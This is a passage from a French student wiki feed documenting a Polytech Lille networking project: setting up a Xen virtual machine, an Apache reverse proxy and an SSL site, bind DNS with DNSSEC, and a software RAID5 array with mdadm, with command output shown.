 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
 ProxyPass / http://192.168.0.100:80&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:80&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
 ProxyPass / http://192.168.0.200:80&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.200:80&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
server 1 et 2 identique a part adresse IP:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:80&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:80&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 ServerAdmin webmaster@localhost&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
 ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
 CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46644</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46644"/>
				<updated>2017-12-14T17:50:04Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Sécurisation et cryptage des données&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       '''ssh root@cordouan.insecserv.deule.net'''&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       '''xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie'''&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       '''xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg'''&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       '''root@cordouan:~# xl list'''&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       '''xl console IMA5-BANANE'''&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    '''ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179'''&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# vim /etc/ssh/sshd_config'''&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    '''root@IMA5-BANANE:~# service ssh restart'''&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commençons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr'''&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr'''&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# apt-get install postfix mailx'''&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs'''&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf''' &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2# cat ports.conf''' &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload'''&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local'''&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf'''&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space'''&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls'''&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       '''vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v'''&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       '''root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg'''&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    '''apt-get install mdadm'''&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    '''mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf'''&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/'''&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    '''/dev/md0 /datamd0'''&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/datamd0# vim raid5test.txt'''&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail /dev/md0'''&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail /dev/md0'''&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# ls /datamd0/'''&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
